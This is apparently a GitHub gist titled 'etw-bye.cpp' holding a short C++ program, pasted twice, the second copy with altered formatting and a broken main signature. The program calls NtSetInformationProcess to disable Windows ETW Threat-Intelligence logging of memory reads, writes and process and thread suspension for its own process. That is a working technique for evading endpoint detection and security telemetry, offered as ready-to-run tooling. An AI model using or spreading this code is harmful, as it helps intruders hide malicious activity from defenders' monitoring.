iilegacyyii/etw-bye.cpp Secret

## etw-bye.cpp
#include <windows.h>
#include <stdio.h>

#pragma region [typedefs]

typedef enum _PROCESSINFORMATIONCLASS
{
    ProcessBasicInformation = 0x0,
    ProcessQuotaLimits = 0x1,
    ProcessIoCounters = 0x2,
    ProcessVmCounters = 0x3,
    ProcessTimes = 0x4,
    ProcessBasePriority = 0x5,
    ProcessRaisePriority = 0x6,
    ProcessDebugPort = 0x7,
    ProcessExceptionPort = 0x8,
    ProcessAccessToken = 0x9,
    ProcessLdtInformation = 0xa,
    ProcessLdtSize = 0xb,
    ProcessDefaultHardErrorMode = 0xc,
    ProcessIoPortHandlers = 0xd,
    ProcessPooledUsageAndLimits = 0xe,
    ProcessWorkingSetWatch = 0xf,
    ProcessUserModeIOPL = 0x10,
    ProcessEnableAlignmentFaultFixup = 0x11,
    ProcessPriorityClass = 0x12,
    ProcessWx86Information = 0x13,
    ProcessHandleCount = 0x14,
    ProcessAffinityMask = 0x15,
    ProcessPriorityBoost = 0x16,
    ProcessDeviceMap = 0x17,
    ProcessSessionInformation = 0x18,
    ProcessForegroundInformation = 0x19,
    ProcessWow64Information = 0x1a,
    ProcessImageFileName = 0x1b,
    ProcessLUIDDeviceMapsEnabled = 0x1c,
    ProcessBreakOnTermination = 0x1d,
    ProcessDebugObjectHandle = 0x1e,
    ProcessDebugFlags = 0x1f,
    ProcessHandleTracing = 0x20,
    ProcessIoPriority = 0x21,
    ProcessExecuteFlags = 0x22,
    ProcessResourceManagement = 0x23,
    ProcessCookie = 0x24,
    ProcessImageInformation = 0x25,
    ProcessCycleTime = 0x26,
    ProcessPagePriority = 0x27,
    ProcessInstrumentationCallback = 0x28,
    ProcessThreadStackAllocation = 0x29,
    ProcessWorkingSetWatchEx = 0x2a,
    ProcessImageFileNameWin32 = 0x2b,
    ProcessImageFileMapping = 0x2c,
    ProcessAffinityUpdateMode = 0x2d,
    ProcessMemoryAllocationMode = 0x2e,
    ProcessGroupInformation = 0x2f,
    ProcessTokenVirtualizationEnabled = 0x30,
    ProcessConsoleHostProcess = 0x31,
    ProcessWindowInformation = 0x32,
    ProcessHandleInformation = 0x33,
    ProcessMitigationPolicy = 0x34,
    ProcessDynamicFunctionTableInformation = 0x35,
    ProcessHandleCheckingMode = 0x36,
    ProcessKeepAliveCount = 0x37,
    ProcessRevokeFileHandles = 0x38,
    ProcessWorkingSetControl = 0x39,
    ProcessHandleTable = 0x3a,
    ProcessCheckStackExtentsMode = 0x3b,
    ProcessCommandLineInformation = 0x3c,
    ProcessProtectionInformation = 0x3d,
    ProcessMemoryExhaustion = 0x3e,
    ProcessFaultInformation = 0x3f,
    ProcessTelemetryIdInformation = 0x40,
    ProcessCommitReleaseInformation = 0x41,
    ProcessDefaultCpuSetsInformation = 0x42,
    ProcessAllowedCpuSetsInformation = 0x43,
    ProcessSubsystemProcess = 0x44,
    ProcessJobMemoryInformation = 0x45,
    ProcessInPrivate = 0x46,
    ProcessRaiseUMExceptionOnInvalidHandleClose = 0x47,
    ProcessIumChallengeResponse = 0x48,
    ProcessChildProcessInformation = 0x49,
    ProcessHighGraphicsPriorityInformation = 0x4a,
    ProcessSubsystemInformation = 0x4b,
    ProcessEnergyValues = 0x4c,
    ProcessActivityThrottleState = 0x4d,
    ProcessActivityThrottlePolicy = 0x4e,
    ProcessWin32kSyscallFilterInformation = 0x4f,
    ProcessDisableSystemAllowedCpuSets = 0x50,
    ProcessWakeInformation = 0x51,
    ProcessEnergyTrackingState = 0x52,
    ProcessManageWritesToExecutableMemory = 0x53,
    ProcessCaptureTrustletLiveDump = 0x54,
    ProcessTelemetryCoverage = 0x55,
    ProcessEnclaveInformation = 0x56,
    ProcessEnableReadWriteVmLogging = 0x57,
    ProcessUptimeInformation = 0x58,
    ProcessImageSection = 0x59,
    ProcessDebugAuthInformation = 0x5a,
    ProcessSystemResourceManagement = 0x5b,
    ProcessSequenceNumber = 0x5c,
    ProcessLoaderDetour = 0x5d,
    ProcessSecurityDomainInformation = 0x5e,
    ProcessCombineSecurityDomainsInformation = 0x5f,
    ProcessEnableLogging = 0x60,
    ProcessLeapSecondInformation = 0x61,
    ProcessFiberShadowStackAllocation = 0x62,
    ProcessFreeFiberShadowStackAllocation = 0x63,
    MaxProcessInfoClass = 0x64
} PROCESSINFORMATIONCLASS;

typedef struct _PROCESS_LOGGING_INFORMATION
{
    ULONG Flags;
    ULONG EnableReadVmLogging;
    ULONG EnableWriteVmLogging;
    ULONG EnableProcessSuspendResumeLogging;
    ULONG EnableThreadSuspendResumeLogging;
    //ULONG EnableLocalExecProtectVmLogging : 1;  // New in Win11
    //ULONG EnableRemoteExecProtectVmLogging : 1; // New in Win11
    ULONG Reserved = 26;
} PROCESS_LOGGING_INFORMATION, * PPROCESS_LOGGING_INFORMATION;

typedef union _PROCESS_READWRITEVM_LOGGING_INFORMATION
{
    UCHAR Flags;
    struct
    {
        UCHAR EnableReadVmLogging : 1;
        UCHAR EnableWriteVmLogging : 1;
        UCHAR Unused : 6;
    };
} PROCESS_READWRITEVM_LOGGING_INFORMATION, * PPROCESS_READWRITEVM_LOGGING_INFORMATION;


typedef NTSTATUS(NTAPI* typeNtSetInformationProcess)(HANDLE ProcessHandle, ULONG ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength);


#pragma endregion

int main(int argc, char** argv, char** envp)
{

    HMODULE Ntdll = GetModuleHandleA("ntdll.dll");
    typeNtSetInformationProcess NtSetInformationProcess = (typeNtSetInformationProcess)GetProcAddress(Ntdll, "NtSetInformationProcess");

    // Prepare for NtSetInformationProcess
    PROCESS_LOGGING_INFORMATION ProcessLoggingInformation = { 0 };
    ProcessLoggingInformation.Flags = (ULONG)0xf;
    ProcessLoggingInformation.EnableReadVmLogging = 0;
    ProcessLoggingInformation.EnableWriteVmLogging = 0;
    ProcessLoggingInformation.EnableProcessSuspendResumeLogging = 0;
    ProcessLoggingInformation.EnableThreadSuspendResumeLogging = 0;
    ProcessLoggingInformation.Reserved = 26;

    NTSTATUS Status = NtSetInformationProcess(
        (HANDLE)-1, // -1 is pseudo-handle to current process
        (ULONG)ProcessEnableLogging,
        &ProcessLoggingInformation,
        sizeof(_PROCESS_LOGGING_INFORMATION));

    if (Status == 0)
    {
        printf("[+] Successfully disabled the following ETW-Ti events\n"
               " - ReadVmLogging\n"
               " - WriteVmLogging\n"
               " - ProcessSuspendResumeLogging\n"
               " - ThreadSuspendResumeLogging\n");
    }
    else
    {
        printf("[!] Error, status 0x%08X\n", Status);
    }

	return 0;
}
	#include <windows.h>
	#include <stdio.h>

	#pragma region [typedefs]

	typedef enum _PROCESSINFORMATIONCLASS
	{
	ProcessBasicInformation = 0x0,
	ProcessQuotaLimits = 0x1,
	ProcessIoCounters = 0x2,
	ProcessVmCounters = 0x3,
	ProcessTimes = 0x4,
	ProcessBasePriority = 0x5,
	ProcessRaisePriority = 0x6,
	ProcessDebugPort = 0x7,
	ProcessExceptionPort = 0x8,
	ProcessAccessToken = 0x9,
	ProcessLdtInformation = 0xa,
	ProcessLdtSize = 0xb,
	ProcessDefaultHardErrorMode = 0xc,
	ProcessIoPortHandlers = 0xd,
	ProcessPooledUsageAndLimits = 0xe,
	ProcessWorkingSetWatch = 0xf,
	ProcessUserModeIOPL = 0x10,
	ProcessEnableAlignmentFaultFixup = 0x11,
	ProcessPriorityClass = 0x12,
	ProcessWx86Information = 0x13,
	ProcessHandleCount = 0x14,
	ProcessAffinityMask = 0x15,
	ProcessPriorityBoost = 0x16,
	ProcessDeviceMap = 0x17,
	ProcessSessionInformation = 0x18,
	ProcessForegroundInformation = 0x19,
	ProcessWow64Information = 0x1a,
	ProcessImageFileName = 0x1b,
	ProcessLUIDDeviceMapsEnabled = 0x1c,
	ProcessBreakOnTermination = 0x1d,
	ProcessDebugObjectHandle = 0x1e,
	ProcessDebugFlags = 0x1f,
	ProcessHandleTracing = 0x20,
	ProcessIoPriority = 0x21,
	ProcessExecuteFlags = 0x22,
	ProcessResourceManagement = 0x23,
	ProcessCookie = 0x24,
	ProcessImageInformation = 0x25,
	ProcessCycleTime = 0x26,
	ProcessPagePriority = 0x27,
	ProcessInstrumentationCallback = 0x28,
	ProcessThreadStackAllocation = 0x29,
	ProcessWorkingSetWatchEx = 0x2a,
	ProcessImageFileNameWin32 = 0x2b,
	ProcessImageFileMapping = 0x2c,
	ProcessAffinityUpdateMode = 0x2d,
	ProcessMemoryAllocationMode = 0x2e,
	ProcessGroupInformation = 0x2f,
	ProcessTokenVirtualizationEnabled = 0x30,
	ProcessConsoleHostProcess = 0x31,
	ProcessWindowInformation = 0x32,
	ProcessHandleInformation = 0x33,
	ProcessMitigationPolicy = 0x34,
	ProcessDynamicFunctionTableInformation = 0x35,
	ProcessHandleCheckingMode = 0x36,
	ProcessKeepAliveCount = 0x37,
	ProcessRevokeFileHandles = 0x38,
	ProcessWorkingSetControl = 0x39,
	ProcessHandleTable = 0x3a,
	ProcessCheckStackExtentsMode = 0x3b,
	ProcessCommandLineInformation = 0x3c,
	ProcessProtectionInformation = 0x3d,
	ProcessMemoryExhaustion = 0x3e,
	ProcessFaultInformation = 0x3f,
	ProcessTelemetryIdInformation = 0x40,
	ProcessCommitReleaseInformation = 0x41,
	ProcessDefaultCpuSetsInformation = 0x42,
	ProcessAllowedCpuSetsInformation = 0x43,
	ProcessSubsystemProcess = 0x44,
	ProcessJobMemoryInformation = 0x45,
	ProcessInPrivate = 0x46,
	ProcessRaiseUMExceptionOnInvalidHandleClose = 0x47,
	ProcessIumChallengeResponse = 0x48,
	ProcessChildProcessInformation = 0x49,
	ProcessHighGraphicsPriorityInformation = 0x4a,
	ProcessSubsystemInformation = 0x4b,
	ProcessEnergyValues = 0x4c,
	ProcessActivityThrottleState = 0x4d,
	ProcessActivityThrottlePolicy = 0x4e,
	ProcessWin32kSyscallFilterInformation = 0x4f,
	ProcessDisableSystemAllowedCpuSets = 0x50,
	ProcessWakeInformation = 0x51,
	ProcessEnergyTrackingState = 0x52,
	ProcessManageWritesToExecutableMemory = 0x53,
	ProcessCaptureTrustletLiveDump = 0x54,
	ProcessTelemetryCoverage = 0x55,
	ProcessEnclaveInformation = 0x56,
	ProcessEnableReadWriteVmLogging = 0x57,
	ProcessUptimeInformation = 0x58,
	ProcessImageSection = 0x59,
	ProcessDebugAuthInformation = 0x5a,
	ProcessSystemResourceManagement = 0x5b,
	ProcessSequenceNumber = 0x5c,
	ProcessLoaderDetour = 0x5d,
	ProcessSecurityDomainInformation = 0x5e,
	ProcessCombineSecurityDomainsInformation = 0x5f,
	ProcessEnableLogging = 0x60,
	ProcessLeapSecondInformation = 0x61,
	ProcessFiberShadowStackAllocation = 0x62,
	ProcessFreeFiberShadowStackAllocation = 0x63,
	MaxProcessInfoClass = 0x64
	} PROCESSINFORMATIONCLASS;

	typedef struct _PROCESS_LOGGING_INFORMATION
	{
	ULONG Flags;
	ULONG EnableReadVmLogging;
	ULONG EnableWriteVmLogging;
	ULONG EnableProcessSuspendResumeLogging;
	ULONG EnableThreadSuspendResumeLogging;
	//ULONG EnableLocalExecProtectVmLogging : 1; // New in Win11
	//ULONG EnableRemoteExecProtectVmLogging : 1; // New in Win11
	ULONG Reserved = 26;
	} PROCESS_LOGGING_INFORMATION, * PPROCESS_LOGGING_INFORMATION;

	typedef union _PROCESS_READWRITEVM_LOGGING_INFORMATION
	{
	UCHAR Flags;
	struct
	{
	UCHAR EnableReadVmLogging : 1;
	UCHAR EnableWriteVmLogging : 1;
	UCHAR Unused : 6;
	};
	} PROCESS_READWRITEVM_LOGGING_INFORMATION, * PPROCESS_READWRITEVM_LOGGING_INFORMATION;


	typedef NTSTATUS(NTAPI* typeNtSetInformationProcess)(HANDLE ProcessHandle, ULONG ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength);


	#pragma endregion

	int main(int argc, char argv, char envp)
	{

	HMODULE Ntdll = GetModuleHandleA("ntdll.dll");
	typeNtSetInformationProcess NtSetInformationProcess = (typeNtSetInformationProcess)GetProcAddress(Ntdll, "NtSetInformationProcess");

	// Prepare for NtSetInformationProcess
	PROCESS_LOGGING_INFORMATION ProcessLoggingInformation = { 0 };
	ProcessLoggingInformation.Flags = (ULONG)0xf;
	ProcessLoggingInformation.EnableReadVmLogging = 0;
	ProcessLoggingInformation.EnableWriteVmLogging = 0;
	ProcessLoggingInformation.EnableProcessSuspendResumeLogging = 0;
	ProcessLoggingInformation.EnableThreadSuspendResumeLogging = 0;
	ProcessLoggingInformation.Reserved = 26;

	NTSTATUS Status = NtSetInformationProcess(
	(HANDLE)-1, // -1 is pseudo-handle to current process
	(ULONG)ProcessEnableLogging,
	&ProcessLoggingInformation,
	sizeof(_PROCESS_LOGGING_INFORMATION));

	if (Status == 0)
	{
	printf("[+] Successfully disabled the following ETW-Ti events\n"
	" - ReadVmLogging\n"
	" - WriteVmLogging\n"
	" - ProcessSuspendResumeLogging\n"
	" - ThreadSuspendResumeLogging\n");
	}
	else
	{
	printf("[!] Error, status 0x%08X\n", Status);
	}

	return 0;
	}